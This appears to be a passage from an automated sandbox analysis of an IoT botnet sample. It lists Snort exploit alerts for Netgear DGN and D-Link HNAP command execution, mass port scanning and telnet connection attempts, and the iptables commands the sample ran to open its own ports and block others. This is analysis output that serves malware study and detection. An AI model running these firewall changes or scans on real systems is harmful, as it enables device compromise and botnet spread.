                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:35942 -> 91.195.35.202:8080
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45572 -> 3.221.14.87:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45572 -> 3.221.14.87:80
                            Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60680 -> 112.74.206.52:80
                            Connects to many ports of the same IP (likely port scanning)Show sources
                            Source: global trafficTCP traffic: 1.18.146.134 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 36.64.16.33 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 155.116.23.175 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 68.163.230.108 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 34.144.108.84 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 29.250.199.167 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 6.141.67.12 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 129.210.175.243 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 105.137.202.218 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 54.168.251.73 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 169.134.101.55 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 50.41.174.31 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 138.7.161.211 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 175.141.183.193 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 201.10.247.77 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 190.180.20.21 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 74.69.135.216 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 74.5.187.133 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 156.194.253.153 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 156.249.53.230 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 144.110.172.80 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 55.92.128.187 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 168.30.37.171 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 185.202.14.118 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 85.233.216.179 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 216.111.216.82 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 132.35.122.63 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 166.126.250.196 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 49.215.96.136 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 91.51.225.145 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 50.71.248.204 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 176.127.83.100 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 59.17.48.95 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 11.48.52.253 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 17.164.29.91 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 72.112.217.68 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 181.52.149.110 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 82.26.244.178 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 125.102.41.232 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 145.249.112.110 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 182.183.14.60 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 108.221.87.254 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 125.113.60.52 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 91.180.74.171 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 184.12.203.227 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 44.146.63.186 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 134.191.166.14 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 135.121.123.52 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 70.170.178.192 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 99.37.65.129 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 44.51.94.199 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 133.183.45.107 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 170.223.178.160 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 206.165.78.36 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 16.184.42.108 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 207.48.109.17 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 165.40.111.59 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 198.197.25.140 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 19.139.235.199 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 24.85.80.95 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 57.51.108.187 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 116.147.238.153 ports 1,2,3,5,7,37215
                            Uses known network protocols on non-standard portsShow sources
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34674
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34680
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34684
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34686
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34688
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34690
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34692
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34694
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34696
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35276
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35278
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35290
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35292
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35298
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35300
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32848 -> 8443
                            Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                            Source: /bin/sh (PID: 6827)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6857)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6863)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6897)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6913)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6935)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6948)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6973)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6992)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                            Source: /bin/sh (PID: 6995)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                            Source: /bin/sh (PID: 6998)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                            Source: /bin/sh (PID: 7010)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                            Source: /bin/sh (PID: 7067)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                            Source: /bin/sh (PID: 7093)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                            Source: /bin/sh (PID: 7122)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                            Source: /bin/sh (PID: 7145)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                            Source: /bin/sh (PID: 7163)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                            Source: /bin/sh (PID: 7179)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                            Source: /bin/sh (PID: 7200)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                            Source: /bin/sh (PID: 7216)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                            Source: /bin/sh (PID: 7230)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                            Source: /bin/sh (PID: 7248)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                            Source: /bin/sh (PID: 7261)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                            Source: /bin/sh (PID: 7290)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                            Source: /bin/sh (PID: 7316)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7319)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7327)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7351)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7378)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7405)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7426)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7439)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
                            Source: global trafficTCP traffic: 192.168.2.20:43926 -> 149.185.53.154:81
                            Source: global trafficTCP traffic: 192.168.2.20:40304 -> 155.61.123.253:81
                            Source: global trafficTCP traffic: 192.168.2.20:38230 -> 105.137.202.218:49152
                            Source: global trafficTCP traffic: 192.168.2.20:42082 -> 99.37.65.129:37215
                            Source: global trafficTCP traffic: 192.168.2.20:33594 -> 175.141.183.193:37215
                            Source: global trafficTCP traffic: 192.168.2.20:47968 -> 84.60.151.77:37215
                            Source: global trafficTCP traffic: 192.168.2.20:37470 -> 132.169.224.240:8443
                            Source: global trafficTCP traffic: 192.168.2.20:33484 -> 207.49.85.172:7574
                            Source: global trafficTCP traffic: 192.168.2.20:52462 -> 101.215.138.244:81
                            Source: global trafficTCP traffic: 192.168.2.20:46118 -> 141.139.161.123:8080
                            Source: global trafficTCP traffic: 192.168.2.20:48144 -> 190.180.20.21:49152
                            Source: global trafficTCP traffic: 192.168.2.20:44582 -> 97.152.141.58:8080
                            Source: global trafficTCP traffic: 192.168.2.20:34278 -> 132.35.122.63:49152
                            Source: global trafficTCP traffic: 192.168.2.20:42042 -> 206.66.211.183:7574
                            Source: global trafficTCP traffic: 192.168.2.20:47978 -> 5.69.78.55:8443
                            Source: global trafficTCP traffic: 192.168.2.20:40184 -> 138.58.82.192:8080
                            Source: global trafficTCP traffic: 192.168.2.20:41086 -> 50.41.174.31:49152
                            Source: global trafficTCP traffic: 192.168.2.20:52626 -> 85.233.216.179:49152
                            Source: global trafficTCP traffic: 192.168.2.20:52580 -> 193.176.243.123:8080
                            Source: global trafficTCP traffic: 192.168.2.20:50830 -> 59.17.48.95:37215
                            Source: global trafficTCP traffic: 192.168.2.20:56092 -> 176.127.83.100:49152
                            Source: global trafficTCP traffic: 192.168.2.20:39232 -> 34.144.108.84:49152
                            Source: global trafficTCP traffic: 192.168.2.20:45750 -> 133.183.45.107:49152
                            Source: global trafficTCP traffic: 192.168.2.20:48552 -> 43.163.194.108:8080
                            Source: global trafficTCP traffic: 192.168.2.20:35468 -> 55.92.128.187:52869
                            Source: global trafficTCP traffic: 192.168.2.20:48664 -> 73.227.59.34:7574
                            Source: global trafficTCP traffic: 192.168.2.20:52060 -> 201.10.247.77:52869
                            Source: global trafficTCP traffic: 192.168.2.20:53640 -> 1.86.24.162:5555
                            Source: global trafficTCP traffic: 192.168.2.20:50032 -> 117.145.177.145:8080
                            Source: global trafficTCP traffic: 192.168.2.20:60014 -> 124.193.58.88:7574
                            Source: global trafficTCP traffic: 192.168.2.20:53660 -> 7.175.103.180:5555
                            Source: global trafficTCP traffic: 192.168.2.20:51380 -> 103.98.158.56:81
                            Source: global trafficTCP traffic: 192.168.2.20:52262 -> 135.108.6.213:8080
                            Source: global trafficTCP traffic: 192.168.2.20:33314 -> 125.113.60.52:49152
                            Source: global trafficTCP traffic: 192.168.2.20:36276 -> 68.204.221.204:8443
                            Source: global trafficTCP traffic: 192.168.2.20:56462 -> 96.243.133.72:8080
                            Source: global trafficTCP traffic: 192.168.2.20:34528 -> 144.110.172.80:37215
                            Source: global trafficTCP traffic: 192.168.2.20:42294 -> 5.116.203.63:8080
                            Source: global trafficTCP traffic: 192.168.2.20:52428 -> 205.102.198.206:8080
                            Source: global trafficTCP traffic: 192.168.2.20:59822 -> 55.221.175.118:8443
                            Source: global trafficTCP traffic: 192.168.2.20:48250 -> 159.239.202.226:5555
                            Source: global trafficTCP traffic: 192.168.2.20:55236 -> 1.229.187.151:81
                            Source: global trafficTCP traffic: 192.168.2.20:35456 -> 185.69.187.126:7574
                            Source: global trafficTCP traffic: 192.168.2.20:42480 -> 189.6.77.233:81
                            Source: global trafficTCP traffic: 192.168.2.20:38974 -> 91.51.225.145:52869
                            Source: global trafficTCP traffic: 192.168.2.20:34920 -> 5.186.7.92:81
                            Source: global trafficTCP traffic: 192.168.2.20:41574 -> 31.116.224.12:8443
                            Source: global trafficTCP traffic: 192.168.2.20:52566 -> 49.215.96.136:49152
                            Source: global trafficTCP traffic: 192.168.2.20:54116 -> 50.71.248.204:37215
                            Source: global trafficTCP traffic: 192.168.2.20:40006 -> 117.41.103.207:8080
                            Source: global trafficTCP traffic: 192.168.2.20:34908 -> 57.51.108.187:37215
                            Source: global trafficTCP traffic: 192.168.2.20:52718 -> 151.214.152.36:81
                            Source: global trafficTCP traffic: 192.168.2.20:42630 -> 210.87.19.176:8080
                            Source: global trafficTCP traffic: 192.168.2.20:45752 -> 52.46.146.246:8080
                            Source: global trafficTCP traffic: 192.168.2.20:46532 -> 163.196.185.185:5555
                            Source: global trafficTCP traffic: 192.168.2.20:50614 -> 138.7.59.44:49152
                            Source: global trafficTCP traffic: 192.168.2.20:58240 -> 6.141.67.12:52869
                            Source: global trafficTCP traffic: 192.168.2.20:54036 -> 182.183.14.60:49152
                            Source: global trafficTCP traffic: 192.168.2.20:33700 -> 213.37.141.115:5555
                            Source: global trafficTCP traffic: 192.168.2.20:51012 -> 89.150.101.206:8080
                            Source: global trafficTCP traffic: 192.168.2.20:47588 -> 126.180.188.226:7574
                            Source: global trafficTCP traffic: 192.168.2.20:33908 -> 62.250.214.124:7574
                            Source: global trafficTCP traffic: 192.168.2.20:36634 -> 44.146.63.186:37215
                            Source: global trafficTCP traffic: 192.168.2.20:45226 -> 48.216.208.173:5555
                            Source: global trafficTCP traffic: 192.168.2.20:44272 -> 203.9.163.102:8443
                            Source: global trafficTCP traffic: 192.168.2.20:51112 -> 198.153.109.170:81
                            Source: global trafficTCP traffic: 192.168.2.20:48618 -> 203.250.146.230:8080
                            Source: global trafficTCP traffic: 192.168.2.20:38448 -> 135.121.123.52:49152
                            Source: global trafficTCP traffic: 192.168.2.20:37272 -> 170.223.178.160:37215
                            Source: global trafficTCP traffic: 192.168.2.20:47030 -> 16.184.42.108:52869
                            Source: global trafficTCP traffic: 192.168.2.20:60426 -> 181.52.149.110:52869
                            Source: global trafficTCP traffic: 192.168.2.20:49010 -> 159.14.216.23:8443
                            Source: global trafficTCP traffic: 192.168.2.20:34130 -> 74.5.187.133:52869
                            Source: global trafficTCP traffic: 192.168.2.20:38078 -> 58.217.250.57:8443
                            Source: global trafficTCP traffic: 192.168.2.20:37196 -> 105.159.210.4:8080
                            Source: global trafficTCP traffic: 192.168.2.20:39148 -> 71.13.95.149:8080
                            Source: global trafficTCP traffic: 192.168.2.20:43494 -> 36.64.16.33:49152
                            Source: global trafficTCP traffic: 192.168.2.20:37108 -> 47.253.230.173:5555
                            Source: global trafficTCP traffic: 192.168.2.20:49774 -> 166.126.250.196:49152
                            Source: global trafficTCP traffic: 192.168.2.20:34880 -> 142.135.25.78:8080
                            Source: global trafficTCP traffic: 192.168.2.20:48738 -> 168.30.37.171:49152
                            Source: global trafficTCP traffic: 192.168.2.20:51516 -> 173.102.232.221:5555
                            Source: global trafficTCP traffic: 192.168.2.20:37574 -> 111.122.147.188:8080
                            Source: global trafficTCP traffic: 192.168.2.20:55336 -> 64.136.60.132:8443
                            Source: global trafficTCP traffic: 192.168.2.20:42150 -> 31.184.54.69:8080
                            Source: global trafficTCP traffic: 192.168.2.20:60296 -> 111.107.14.55:8080
                            Source: global trafficTCP traffic: 192.168.2.20:51774 -> 24.85.80.95:49152
                            Source: global trafficTCP traffic: 192.168.2.20:43044 -> 129.210.175.243:37215
                            Source: global trafficTCP traffic: 192.168.2.20:36094 -> 36.238.254.86:8080
                            Source: global trafficTCP traffic: 192.168.2.20:57624 -> 201.13.139.241:8080
                            Source: global trafficTCP traffic: 192.168.2.20:60788 -> 96.13.10.218:8443
                            Source: global trafficTCP traffic: 192.168.2.20:34778 -> 103.69.161.106:7574
                            Source: global trafficTCP traffic: 192.168.2.20:42968 -> 117.47.195.144:8080
                            Source: global trafficTCP traffic: 192.168.2.20:48084 -> 134.191.166.14:49152
                            Source: global trafficTCP traffic: 192.168.2.20:53088 -> 148.213.108.240:7574
                            Source: global trafficTCP traffic: 192.168.2.20:52810 -> 125.221.235.0:8080
                            Source: global trafficTCP traffic: 192.168.2.20:39682 -> 206.165.78.36:37215
                            Source: global trafficTCP traffic: 192.168.2.20:56940 -> 116.142.239.53:8443
                            Source: global trafficTCP traffic: 192.168.2.20:60816 -> 11.248.186.95:8080
                            Source: global trafficTCP traffic: 192.168.2.20:60522 -> 62.174.49.184:8080
                            Source: global trafficTCP traffic: 192.168.2.20:45898 -> 153.220.50.14:81
                            Source: global trafficTCP traffic: 192.168.2.20:46192 -> 36.5.246.46:8080
                            Source: global trafficTCP traffic: 192.168.2.20:51322 -> 106.83.13.206:8080
                            Source: global trafficTCP traffic: 192.168.2.20:45798 -> 54.168.251.73:49152
                            Source: global trafficTCP traffic: 192.168.2.20:42262 -> 72.112.217.68:52869
                            Source: global trafficTCP traffic: 192.168.2.20:36422 -> 133.89.177.67:8080
                            Source: global trafficTCP traffic: 192.168.2.20:33958 -> 21.90.118.51:7574
                            Source: global trafficTCP traffic: 192.168.2.20:46510 -> 118.149.161.126:8443
                            Source: global trafficTCP traffic: 192.168.2.20:43272 -> 23.181.68.106:7574
                            Source: global trafficTCP traffic: 192.168.2.20:48896 -> 67.229.204.206:8080
                            Source: global trafficTCP traffic: 192.168.2.20:43214 -> 193.28.36.33:8080
                            Source: global trafficTCP traffic: 192.168.2.20:35272 -> 9.197.125.78:8080
                            Source: global trafficTCP traffic: 192.168.2.20:40834 -> 184.12.203.227:49152
                            Source: global trafficTCP traffic: 192.168.2.20:43326 -> 185.202.14.118:49152
                            Source: global trafficTCP traffic: 192.168.2.20:55580 -> 80.207.49.226:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58080 -> 29.250.199.167:49152
                            Source: global trafficTCP traffic: 192.168.2.20:43824 -> 32.96.131.217:5555
                            Source: global trafficTCP traffic: 192.168.2.20:46416 -> 125.102.41.232:52869
                            Source: global trafficTCP traffic: 192.168.2.20:45010 -> 121.128.113.125:8080
                            Source: global trafficTCP traffic: 192.168.2.20:47312 -> 205.57.172.194:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44042 -> 198.197.25.140:52869
                            Source: global trafficTCP traffic: 192.168.2.20:53916 -> 124.122.67.136:81
                            Source: global trafficTCP traffic: 192.168.2.20:34192 -> 207.48.109.17:37215
                            Source: global trafficTCP traffic: 192.168.2.20:45514 -> 33.170.253.17:8080
                            Source: global trafficTCP traffic: 192.168.2.20:34956 -> 44.51.94.199:52869
                            Source: global trafficTCP traffic: 192.168.2.20:33406 -> 82.26.244.178:49152
                            Source: global trafficTCP traffic: 192.168.2.20:48488 -> 215.176.205.161:8080
                            Source: global trafficTCP traffic: 192.168.2.20:37762 -> 138.65.229.49:8080
                            Source: global trafficTCP traffic: 192.168.2.20:35378 -> 56.164.61.40:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44354 -> 14.6.225.98:7574
                            Source: global trafficTCP traffic: 192.168.2.20:52364 -> 108.221.87.254:37215
                            Source: global trafficTCP traffic: 192.168.2.20:48882 -> 155.116.23.175:52869
                            Source: global trafficTCP traffic: 192.168.2.20:45642 -> 96.137.22.200:7574
                            Source: global trafficTCP traffic: 192.168.2.20:36158 -> 70.170.178.192:37215
                            Source: global trafficTCP traffic: 192.168.2.20:45870 -> 59.167.100.92:8443
                            Source: global trafficTCP traffic: 192.168.2.20:42284 -> 28.65.109.23:8443
                            Source: global trafficTCP traffic: 192.168.2.20:46744 -> 74.69.135.216:52869
                            Source: global trafficTCP traffic: 192.168.2.20:56872 -> 1.18.146.134:49152
                            Source: global trafficTCP traffic: 192.168.2.20:44338 -> 145.249.112.110:37215
                            Source: global trafficTCP traffic: 192.168.2.20:34220 -> 182.112.56.21:37215
                            Source: global trafficTCP traffic: 192.168.2.20:40646 -> 45.228.110.91:8080
                            Source: global trafficTCP traffic: 192.168.2.20:40778 -> 167.154.0.215:81
                            Source: global trafficTCP traffic: 192.168.2.20:50098 -> 109.162.104.119:8080
                            Source: global trafficTCP traffic: 192.168.2.20:59850 -> 6.117.24.0:8080
                            Source: global trafficTCP traffic: 192.168.2.20:59852 -> 148.98.127.31:7574
                            Source: global trafficTCP traffic: 192.168.2.20:50362 -> 213.131.147.141:8443
                            Source: global trafficTCP traffic: 192.168.2.20:60932 -> 22.225.214.100:5555
                            Source: global trafficTCP traffic: 192.168.2.20:58072 -> 19.139.235.199:49152
                            Source: global trafficTCP traffic: 192.168.2.20:36030 -> 174.201.122.204:8443
                            Source: global trafficTCP traffic: 192.168.2.20:42960 -> 156.249.53.230:52869
                            Source: global trafficTCP traffic: 192.168.2.20:46104 -> 11.48.52.253:52869
                            Source: global trafficTCP traffic: 192.168.2.20:46822 -> 86.114.25.82:8080
                            Source: global trafficTCP traffic: 192.168.2.20:51544 -> 216.111.216.82:37215
                            Source: global trafficTCP traffic: 192.168.2.20:38618 -> 17.164.29.91:52869
                            Source: global trafficTCP traffic: 192.168.2.20:42904 -> 45.234.221.196:5555
                            Source: global trafficTCP traffic: 192.168.2.20:33222 -> 66.232.73.239:5555
                            Source: global trafficTCP traffic: 192.168.2.20:45572 -> 59.19.242.88:8080
                            Source: global trafficTCP traffic: 192.168.2.20:37966 -> 91.180.74.171:49152
                            Source: global trafficTCP traffic: 192.168.2.20:34904 -> 131.16.172.129:5555
                            Source: global trafficTCP traffic: 192.168.2.20:48872 -> 72.242.88.155:81
                            Source: global trafficTCP traffic: 192.168.2.20:54330 -> 156.194.253.153:37215
                            Source: global trafficTCP traffic: 192.168.2.20:57496 -> 33.91.25.116:81
                            Source: global trafficTCP traffic: 192.168.2.20:57568 -> 169.134.101.55:49152
                            Source: global trafficTCP traffic: 192.168.2.20:47480 -> 110.10.168.48:5555
                            Source: global trafficTCP traffic: 192.168.2.20:43214 -> 171.5.81.156:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58042 -> 68.163.230.108:52869
                            Source: global trafficTCP traffic: 192.168.2.20:60804 -> 210.219.207.3:8080
                            Source: global trafficTCP traffic: 192.168.2.20:52896 -> 213.58.83.64:81
                            Source: global trafficTCP traffic: 192.168.2.20:35732 -> 125.234.106.133:8080
                            Source: global trafficTCP traffic: 192.168.2.20:38762 -> 182.149.146.177:8080
                            Source: global trafficTCP traffic: 192.168.2.20:49036 -> 138.7.161.211:52869
                            Source: global trafficTCP traffic: 192.168.2.20:47654 -> 109.61.100.248:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58694 -> 94.166.64.10:5555
                            Source: global trafficTCP traffic: 192.168.2.20:48986 -> 163.70.83.83:8080
                            Source: global trafficTCP traffic: 192.168.2.20:43100 -> 183.250.239.211:8080
                            Source: global trafficTCP traffic: 192.168.2.20:37622 -> 33.54.67.97:8080
                            Source: global trafficTCP traffic: 192.168.2.20:55968 -> 84.62.5.182:8443
                            Source: global trafficTCP traffic: 192.168.2.20:46258 -> 116.147.238.153:37215
                            Source: global trafficTCP traffic: 192.168.2.20:34866 -> 6.232.250.250:8080
                            Source: global trafficTCP traffic: 192.168.2.20:33864 -> 1.5.148.231:8080
                            Source: global trafficTCP traffic: 192.168.2.20:39298 -> 55.77.192.67:8443
                            Source: global trafficTCP traffic: 192.168.2.20:34300 -> 220.89.101.239:8443
                            Source: global trafficTCP traffic: 192.168.2.20:52116 -> 187.133.162.42:5555
                            Source: global trafficTCP traffic: 192.168.2.20:34318 -> 105.202.244.96:7574
                            Source: global trafficTCP traffic: 192.168.2.20:43462 -> 103.16.83.23:7574
                            Source: global trafficTCP traffic: 192.168.2.20:33290 -> 153.153.124.97:8080
                            Source: global trafficTCP traffic: 192.168.2.20:57636 -> 137.8.108.189:5555
                            Source: global trafficTCP traffic: 192.168.2.20:59940 -> 77.186.145.187:5555
                            Source: global trafficTCP traffic: 192.168.2.20:42288 -> 16.119.106.89:8080
                            Source: global trafficTCP traffic: 192.168.2.20:47410 -> 77.137.8.165:8080
                            Source: global trafficTCP traffic: 192.168.2.20:36216 -> 42.241.34.105:8080
                            Source: global trafficTCP traffic: 192.168.2.20:40810 -> 183.238.2.60:81
                            Source: global trafficTCP traffic: 192.168.2.20:56094 -> 165.40.111.59:52869
                            Source: global trafficTCP traffic: 192.168.2.20:54388 -> 211.72.191.195:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 203.204.92.244:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 76.179.94.31:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 47.178.77.204:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 121.121.241.203:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 85.26.236.253:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 160.221.21.0:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 53.184.19.200:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 198.9.196.56:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 85.221.238.78:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 143.1.224.175:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 171.153.71.56:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 174.51.201.83:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 13.163.7.33:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 203.223.110.147:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 136.38.16.27:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 47.254.200.229:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 190.227.232.240:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 79.37.180.218:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 46.200.62.22:2323
